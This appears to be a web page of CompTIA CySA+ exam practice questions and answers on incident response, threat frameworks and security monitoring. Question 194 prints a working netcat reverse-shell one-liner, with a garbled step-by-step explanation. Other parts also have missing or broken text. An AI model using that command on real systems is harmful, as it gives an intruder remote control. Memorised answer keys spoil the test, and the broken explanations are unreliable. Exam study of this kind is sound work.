CompTIA CS0-003 Online Practice Questions and Exam Preparation

CompTIA CS0-003 Online Questions & Answers

• Question 191:

  An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation.

  Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?

  A. Hard disk
  B. Primary boot partition
  C. Malicious tiles
  D. Routing table
  E. Static IP address
  D. Routing table

• Question 192:

  An organization recently changed its BC and DR plans.

  Which of the following would best allow for the incident response team to test the changes without any impact to the business?

  A. Perform a tabletop drill based on previously identified incident scenarios.
  B. Simulate an incident by shutting down power to the primary data center.
  C. Migrate active workloads from the primary data center to the secondary location.
  D. Compare the current plan to lessons learned from previous incidents.
  A. Perform a tabletop drill based on previously identified incident scenarios.

  ---

  Explanation

  Performing a tabletop drill based on previously identified incident scenarios is the best way to test the changes to the BC and DR plans without any impact to the business, as it is a low-cost and low-risk method of exercising the plans and identifying any gaps or issues. A tabletop drill is a type of BC/DR exercise that involves gathering key personnel from different departments and roles and discussing how they would respond to a hypothetical incident scenario. A tabletop drill does not involve any actual simulation or disruption of the systems or processes, but rather relies on verbal communication and documentation review. A tabletop drill can help to ensure that everyone is familiar with the BC/DR plans, that the plans reflect the current state of the organization, and that the plans are consistent and coordinated across different functions. The other options are not as suitable as performing a tabletop drill, as they involve more cost, risk, or impact to the business. Simulating an incident by shutting down power to the primary data center is a type of BC/DR exercise that involves creating an actual disruption or outage of a critical system or process, and observing how the organization responds and recovers. This type of exercise can provide a realistic assessment of the BC/DR capabilities, but it can also cause significant impact to the business operations, customers, and reputation. Migrating active workloads from the primary data center to the secondary location is a type of BC/DR exercise that involves switching over from one system or site to another, and verifying that the backup system or site can support the normal operations. This type of exercise can help to validate the functionality and performance of the backup system or site, but it can also incur high costs, complexity, and potential errors or failures. Comparing the current plan to lessons learned from previous incidents is a type of BC/DR activity that involves reviewing past experiences and outcomes, and identifying best practices or improvement opportunities. This activity can help to update and refine the BC/DR plans, but it does not test or validate them in a simulated or actual scenario.

  References:

  https://www.alertmedia.com/blog/tabletop-exercises/

• Question 193:

  A security analyst is reviewing the following alert that was triggered by FIM on a critical system:

  

  Which of the following best describes the suspicious activity that is occurring?

  A. A fake antivirus program was installed by the user.
  B. A network drive was added to allow exfiltration of data.
  C. A new program has been set to execute on system start.
  D. The host firewall on 192.168.1.10 was disabled.
  C. A new program has been set to execute on system start.

  ---

  Explanation

  A new program has been set to execute on system start is the most likely cause of the suspicious activity that is occurring, as it indicates that the malware has modified the registry keys of the system to ensure its persistence. File Integrity Monitoring (FIM) is a tool that monitors changes to files and registry keys on a system and alerts the security analyst of any unauthorized or malicious modifications. The alert triggered by FIM shows that the malware has created a new registry key under the Run subkey, which is used to launch programs automatically when the system starts. The new registry key points to a file named "update.exe" in the Temp folder, which is likely a malicious executable disguised as a legitimate update file.

  https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-answered

  https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-objectives

  https://www.comptia.org/training/books/cysa-cs0-002-study-guide

• Question 194:

  A security analyst detected the following suspicious activity:

  rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f

  Which of the following most likely describes the activity?

  A. Network pivoting
  B. Host scanning
  C. Privilege escalation
  D. Reverse shell
  D. Reverse shell

  ---

  Explanation

  The command rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f is a one-liner that creates a reverse shell from the target machine to the attacker's machine. It does the following steps:

  m -f /tmp/f deletes any existing file named /tmp/f knod /tmp/f p creates a named pipe (FIFO) file named /tmp/f at /tmp/f|/bin/sh -i 2>&1 reads from the pipe and executes the commands using /bin/sh in interactive mode, redirecting the standard error to the standard output c 10.0.0.1 1234 > tmp/f connects to the attacker's machine at IP address 10.0.0.1 and port 1234 using netcat, and writes the output to the pipe.

  This way, the attacker can send commands to the target machine and receive the output through the netcat connection, effectively creating a reverse shell.

  References

  Hack the Galaxy

  Reverse Shell Cheat Sheet

• Question 195:

  Which of the following is a commonly used four-component framework to communicate threat actor behavior?

  A. STRIDE
  B. Diamond Model of Intrusion Analysis
  C. Cyber Kill Chain
  D. MITRE ATT&CK
  B. Diamond Model of Intrusion Analysis

  ---

  Explanation

  The Diamond Model of Intrusion Analysis is a framework that describes the relationship between four components of a cyberattack: adversary, capability, infrastructure, and victim. It helps analysts understand the behavior and motivation of threat actors, as well as the tools and methods they use to compromise their targets 12.

  References:

  Main Analytical Frameworks for Cyber Threat Intelligence, section 4;

  Strategies, tools, and frameworks for building an effective threat intelligence team, section 3.

• Question 196:

  A regulated organization experienced a security breach that exposed a list of customer names with corresponding PII data.

  Which of the following is the best reason for developing the organization's communication plans?

  A. For the organization's public relations department to have a standard notification
  B. To ensure incidents are immediately reported to a regulatory agency
  C. To automate the notification to customers who were impacted by the breach
  D. To have approval from executive leadership on when communication should occur
  B. To ensure incidents are immediately reported to a regulatory agency

• Question 197:

  A development team recently released a new version of a public-facing website for testing prior to production. The development team is soliciting the help of various teams to validate the functionality of the website due to its high visibility.

  Which of the following activities best describes the process the development team is initiating?

  A. Static analysis
  B. Stress testing
  C. Code review
  D. User acceptance testing
  D. User acceptance testing

  ---

  Explanation

  User acceptance testing is a process of verifying that a software application meets the requirements and expectations of the end users before it is released to production. User acceptance testing can help to validate the functionality, usability, performance and compatibility of the software application with real-world scenarios and feedback . User acceptance testing can involve various teams, such as developers, testers, customers and stakeholders.

  https://www.techopedia.com/definition7/user-acceptance-testing-uat

• Question 198:

  An analyst notices that logs contain multiple events for computer account changes during monthly patch maintenance windows, resulting in a flood of tickets. The events generated are from the same system and time frame. The analyst determines that these tickets could be closed without human interaction.

  Which of the following is the best tool for automatically closing tickets containing the same information?

  A. SOAR
  B. EDR
  C. CASB
  D. SIEM
  A. SOAR

• Question 199:

  A security operations manager wants some recommendations for improving security monitoring. The security team currently uses past events to create an IoC list for monitoring.

  Which of the following is the best suggestion for improving monitoring capabilities?

  A. Update the IPS and IDS with the latest rule sets from the provider.
  B. Create an automated script to update the IPS and IDS rule sets.
  C. Use an automated subscription to select threat feeds for IDS.
  D. Implement an automated malware solution on the IPS.
  C. Use an automated subscription to select threat feeds for IDS.

• Question 200:

  During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging.

  The Chief Information Security Officer wants to find out precisely what happened.

  Which of the following actions should the analyst take first?

  A. Clone the virtual server for forensic analysis
  B. Log in to the affected server and begin analysis of the logs
  C. Restore from the last known-good backup to confirm there was no loss of connectivity
  D. Shut down the affected server immediately
  A. Clone the virtual server for forensic analysis

  ---

  Explanation

  The first action that the analyst should take in this case is to clone the virtual server for forensic analysis. Cloning the virtual server involves creating an exact" state at a specific point in time. Cloning the virtual server can help preserve and protect any evidence or information related to the security incident, as well as prevent any tampering, contamination, or destruction of evidence. Cloning the virtual server can also allow the analyst to safely analyze and investigate the incident without affecting the original server or its operations.